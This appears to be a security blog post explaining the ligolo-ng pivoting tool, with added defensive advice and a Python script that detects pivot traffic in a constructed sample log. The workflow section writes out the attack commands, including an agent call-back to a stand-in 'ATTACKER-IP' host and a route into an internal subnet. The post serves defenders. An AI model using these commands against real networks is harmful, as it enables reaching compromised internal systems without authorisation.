
What is ligolo-ng?

ligolo-ng is a modern pivoting tool that gives the attacker a virtual network interface, making an internal subnet reachable as if it were directly connected. No proxychains needed. Here is what it does.

TL;DR

ligolo-ng is an open-source pivoting tool that exposes a compromised network through a virtual TUN interface on the attacker’s machine. Instead of per-port forwards or wrapping every tool in proxychains, the attacker adds a route to the internal subnet and reaches it natively, as if directly connected. It runs an agent on the pivot and a proxy on the attacker side. Its ease of use and full-subnet access have made it a common modern alternative to SSH and chisel for pivoting.

By John Dill, Red Team Lead, SecureLayer7

What ligolo-ng is

Most pivoting forwards one port at a time or routes tools through a SOCKS proxy. ligolo-ng takes a different approach: it creates a virtual network interface (TUN) on the attacker’s machine and routes traffic for the internal subnet through the pivot.

The result is that the attacker’s tools talk to internal IPs directly, with no proxychains and no per-port setup, because the operating system simply routes that subnet over the tunnel. It uses an agent (on the pivot) and a proxy/listener (on the attacker side).

How it works and payload

The typical flow:

  • The attacker starts the proxy and creates the tunnel interface: ligolo-ng proxy -selfcert, then brings up the ligolo interface.
  • The agent runs on the pivot and calls back to the attacker: agent -connect ATTACKER-IP:11601
  • In the proxy console, the attacker starts the tunnel and adds a route to the internal subnet: tunnel_start, then ip route add 10.10.0.0/24 dev ligolo.
  • The attacker now reaches 10.10.0.0/24 directly with any tool, with no proxychains.

These are documented techniques, described here so defenders can recognise them.

How to defend

  • Restrict egress so the pivot agent cannot call back to an external proxy.
  • Segment so even a routed subnet exposes as little as possible.
  • Monitor for the agent’s outbound connection and for one internal host originating traffic to many others.
  • Use application allow-listing to stop a dropped agent binary from running.
  • Inspect outbound traffic and unusual long-lived connections at egress points.
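The third and fifth points above describe two network signals a pivot leaves behind: the agent's long-lived outbound call-back, and one internal host fanning out to many others once the attacker's traffic is routed through it. The script below is an added example (not ligolo-ng code and not from this page's author) that looks for both in a connection log. It assumes a simplified, Zeek-conn-like whitespace-separated format (timestamp, source IP, source port, destination IP, destination port, protocol, duration); the sample lines, IPs, ports and thresholds are constructed for illustration, and the only detail taken from the page is ligolo-ng's default proxy port 11601.

```python
"""Flag ligolo-ng-style pivot signals in a connection log (added example).

Two signals are checked, matching the defensive advice on this page:
  1. an internal host holding a long-lived connection to an external address
     (the pivot agent calling back to the attacker's proxy), and
  2. an internal host originating connections to many distinct internal hosts
     (routed attacker traffic leaving the pivot).
Log format, sample values and thresholds are constructed assumptions.
"""
from collections import defaultdict
from ipaddress import ip_address, ip_network

# RFC 1918 ranges; anything else counts as "external" for this example.
INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample log (ts src sport dst dport proto duration).
# 10.10.0.5 plays the pivot: one 90-minute session to an external host on
# ligolo-ng's default port 11601, then connections to twelve internal hosts.
SAMPLE_LOG = """\
1700000000.1 10.10.0.8  51200 93.184.216.34 443   tcp 2.1
1700000001.4 10.10.0.9  49800 10.10.0.10    445   tcp 0.8
1700000002.0 10.10.0.5  40100 203.0.113.7   11601 tcp 5400.0
""" + "".join(
    f"1700000{100 + i}.0 10.10.0.5 {41000 + i} 10.10.0.{20 + i} {port} tcp 0.3\n"
    for i, port in enumerate([22, 445, 80, 443, 3389, 135, 139, 8080, 21, 25, 5985, 1433])
)


def is_internal(ip: str) -> bool:
    """True if the address falls inside one of the internal ranges."""
    addr = ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_conn_log(text: str) -> list[dict]:
    """Parse the simplified log into one dict per connection; blank and '#' lines are skipped."""
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, src, sport, dst, dport, proto, duration = line.split()
        records.append({"ts": float(ts), "src": src, "sport": int(sport), "dst": dst,
                        "dport": int(dport), "proto": proto, "duration": float(duration)})
    return records


def long_lived_egress(records: list[dict], min_duration: float = 600.0) -> list[dict]:
    """Internal -> external connections held open for at least min_duration seconds."""
    return [r for r in records
            if is_internal(r["src"]) and not is_internal(r["dst"])
            and r["duration"] >= min_duration]


def fan_out_hosts(records: list[dict], min_distinct_dsts: int = 10) -> dict[str, int]:
    """Internal hosts that originate connections to at least min_distinct_dsts other internal hosts."""
    dsts = defaultdict(set)
    for r in records:
        if is_internal(r["src"]) and is_internal(r["dst"]) and r["src"] != r["dst"]:
            dsts[r["src"]].add(r["dst"])
    return {src: len(d) for src, d in dsts.items() if len(d) >= min_distinct_dsts}


def pivot_candidates(text: str, min_duration: float = 600.0, min_distinct_dsts: int = 10) -> list[str]:
    """Hosts showing both signals: a long-lived call-back and subnet fan-out."""
    records = parse_conn_log(text)
    callbacks = {r["src"] for r in long_lived_egress(records, min_duration)}
    fanout = fan_out_hosts(records, min_distinct_dsts)
    return sorted(host for host in fanout if host in callbacks)


if __name__ == "__main__":
    recs = parse_conn_log(SAMPLE_LOG)
    for r in long_lived_egress(recs):
        print(f"long-lived egress: {r['src']} -> {r['dst']}:{r['dport']} ({r['duration']:.0f}s)")
    for host, n in fan_out_hosts(recs).items():
        print(f"fan-out: {host} reached {n} distinct internal hosts")
    print("pivot candidates:", pivot_candidates(SAMPLE_LOG))
```

Either signal on its own produces noise (backup jobs hold long sessions, scanners and monitoring hosts fan out), so pivot_candidates only reports hosts that show both; tune the duration and fan-out thresholds to the baseline of the network you are watching.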
